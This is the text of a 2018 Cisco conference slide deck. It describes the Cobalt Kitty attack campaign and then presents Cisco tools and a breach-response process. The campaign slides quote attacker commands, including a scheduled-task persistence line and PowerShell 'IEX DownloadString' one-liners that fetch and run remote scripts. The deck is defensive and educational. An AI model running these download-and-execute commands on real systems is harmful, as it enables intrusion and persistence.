Breach Detection and Mitigation Practical Examples
Dragan Novakovic Consulting Systems Engineer
3 Challenges Today
Many discrete security products Information overload High cost of attacker attribution Inefficient breach mitigation process
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 4 Advanced Adversary
• A step below government- sponsored attackers but much more wide spread
• Individuals or organized groups, not governments
• Going after a smaller amount of targets but • Capable of steering higher profits per target infections individually
• Going after $$ - intellectual property, access and user data
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 5 • Sandboxing & Analysis evasion • Misuse of legitimate resources • Low forensic footprint Attack Commonalities • Layers of scripting • Steganography Advanced • Stable C&C
YOU
6 From The Trenches: Cobalt Kitty Campaign
§ Well documented campaign § Revealing latest attack techniques & tactics § Resulted in compromise of domain admin account and sever data breach
Lateral Delivery Exploitation Installation Persistence Movement Exfiltration
Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 7 From The Trenches: Cobalt Kitty Campaign
Spear-phishing Delivery – email containing links to fake Flash update – Users likely to grant admin rights – Downloads and executes Cobalt Strike Beacon (post exploitation tool)
Microsoft Office Word document with macros – Macro creates simple scheduled tasks using cmd.exe – Windows App Locker script blocking policy bypass using regsvr32.exe (Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server) – Run PowerShell with rundll32 to bypass software restrictions (https://github.com/p3nt4/PowerShdll)
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 8 From The Trenches: Cobalt Kitty Campaign Scheduled Task Creation Exploitation
schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:''"/mo 15 /F
Microsoft HTML Application VB Script script execution
Set objShell = CreateObject(“Wscript.Shell”)intReturn = objShell.Run(“powershell –execute bypass -com”” IEX ((new-object net.webclient).downloadstring (‘hxxp://xx/image.jpg')))
PowerShell script exec. Run CMD command in VB
Cobalt Strike Beacon 19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 9 From The Trenches: Cobalt Kitty Campaign Persistence Persistence Mechanisms – Windows Scheduled Tasks – Windows Services – Windows Registry Autorun keys Google Update loading goopdate.dll
DLL Hijacking – Using legitimate software to execute a trojanized DLL – Abuses DLL not being there by default OR search order in which it is loaded
Windows Search loading msfte.dll
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 10 From The Trenches: Cobalt Kitty Campaign File-less Credentials and Hashed stealing Lat. Movement – Modified version Of Mimikatz (file-less) – Modified version of password file dumper
Lateral Movement – Pass-the-hash and pass-the-ticket attacks – Use of Windows Management Instrumentation (WMI) for remote execution
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 11 From The Trenches: Cobalt Kitty Campaign Lat. Movement File-less Scanning Using PowerUp – Scanning for open ports, vulnerable services and OS fingerprinting using externally hosted Powershell script loaded into memory:
Powershell Invoke Expression
Powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke- AllChecks File-less download PowerUp method
https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/ https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 12 From The Trenches: Cobalt Kitty Campaign Exfiltration C&C and Exfiltration using NetCat, DNS Tunelling & Cobalt Strike Malleable C2 Outlook scripts to send exfiltrated data to Gmail address
Sends exfiltrated data via email
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 13 “The art of war teaches us to rely - 1445587 - Warriors China
not on the likelihood - - Old
of the enemy's not - Xian
coming, but on our - Statue own readiness to receive him”
Sun Tzu, The Art of War http://maxpixel.freegreatpicture.com/Museum
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 14 1. Hinder In-Advance Attack Preparation
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 15 1. Hinder In-Advance Attack Preparation üCognitive Treat Analytics – Internal state – Passive – No feeds
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 16 1. Hinder In-Advance Attack Preparation üStealthWatch – Passive – Lat. Movement – Baselining
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 17 2. Deploy Generic C&C Detectors ü Umbrella Investigate – Predictive algorithms – Automatic takedown – Co-occurrences
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 18 2. Deploy Generic C&C Detectors ü Cognitive Threat Analytics – Uncover entire infrastructure – Behavior and context – Including low & slow and steganography- based channels
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 19 2. Deploy Generic C&C Detectors ü Encrypted Traffic Analytics (Stealthwatch) Detects malicious traffic by analyzing: – Initial data packet – hostname – certificate information – supported cipher suites – packet size/timing in TLS-based connections
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 20 3. Stream Endpoint and Network Level Traces Because:
Coding errors Mistakes Detection due to happen happen definition update happen
Do: § Collect and have at hand endpoint and network activity logs
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 21 3. Stream Endpoint and Network Level Traces ü AMP for Endpoints – Collects traces – Retrospection – Root cause analysis – Exploit Prevention – Heuristic Detection
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 22 3. Stream Endpoint and Network Level Traces ü StealthWatch – NetFlow for security
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 23 3. Stream Endpoint and Network Level Traces ü Threat Grid – Global database – Indicators of compromise – Pivoting and context
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 24 4. Use Vendor with Large Threat Research Team ü TALOS
MILLIONS THREAT INTEL INTEL SHARING Of Telemetry Agents
1.5 MILLION 600 BILLION Daily Malware Daily Email Service Provider Customer Data Coordination Samples Messages 250+ Sharing Program Programs Full Time Threat Intel Internet-Wide 16 BILLION Researchers Scanning Daily Web Requests 20 BILLION 500+ Threats Blocked Participants Open 100+ Product Industry Source Threat Intelligence Telemetry Honeypots Sharing Partnershi Intel Partners ps (ISACs) Sharing Vulnerability Discovery Open Source rd (Internal) Communities 3 Party Programs (MAPP) 1100+ Threat Traps 19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 25 4. Use Vendor with Large Threat Research Team
ü TALOS
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 26 4. Use Vendor with Large Threat Research Team
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 27 5. Deploy Full Detector Stack FW/NGFW More detectors NGIPS Antivirus Reputation/Rules Policy/Patches Complex malware Content Filtering Sandboxing Anomaly Bugs, Cost & Risk Increase Machine Learning
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 28 Everything is Configured…Now what?
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 29 Breach Detection and Mitigation - Practically!
Breach Detection Immediate Reaction Final Reaction
Detecting a Following traces Finding additional breach from C&C to a file malicious activity Establishing Estimating on the endpoint priority rating spread on the Analyzing the endpoint and in root cause the network Reimaging the Reviewing related Final Reaction affected
Breach Detection network activity endpoints
Immediate Reaction Updating policies to prevent reinfection
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 30 Breach Detection and Mitigation Process
• CTA detects C2 channel (or Umbrella or Investigate or IoC or Talos)
• TG provides global and local file behavior context (endpoint level details)
• AMP identifies files responsible for C&C activity and provides endpoint visibility
• AMP quarantines malicious executables and blocks their further reintroduction
• ISE quarantines the endpoint
• AMP is used for root cause analysis before endpoint is re-imaged
All steps need to be done within hours to prevent data leaks!
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 31 Notification About a Breach Daily reports in CTA
Too Slow!
Weekly reports in AMP
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 32 Notification About a Breach - Better! § Subscribe to email alerts § Use SIEM for a more granular control
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 33 Establishing Priority Rating AMP and Threat Grid Threat prioritization
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 34 Establishing Priority Rating CTA Threat prioritization
Critical Risk High Risk Medium Risk Low Risk Data damage Bad infection Light infection Network only Quarantine Reimage Try clean Try clean Reimage If failed, reimage If failed, monitor
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 35 Establishing Priority Rating Demo: AMP Event Correlation Step 1: Breach Detection
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 37 Demo: Breach Detection Step 2: Immediate Reaction
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 39 Demo: Immediate Reaction Automatic response with ISE
HTTP(S)
Quarantine Logs
Device STIX/TAXII
ISE CTA Incident
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 41 Block Everywhere - AMP Unity Device Trajectory Customer Specific
Whitelists Blacklists
AMP Cloud
Endpoints Network Appliances Content Appliances
WWW
NGIPS NGFW WSA ESA
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 42 Step 3: Final Reaction
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 43 Demo: Final Reaction Complex Malware Revealed
Malware Powershell Browser Stealing injection privilege extension browser path escalation installation credentials
Would be prevented by ISE quarantine
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 45 Browser Exfiltration Module Revealed
C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 46 Technologies Used
• AMP for Endpoints • Cognitive Threat Analytics • Threat Grid • StealthWatch • AMP Visibility • ISE
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia 47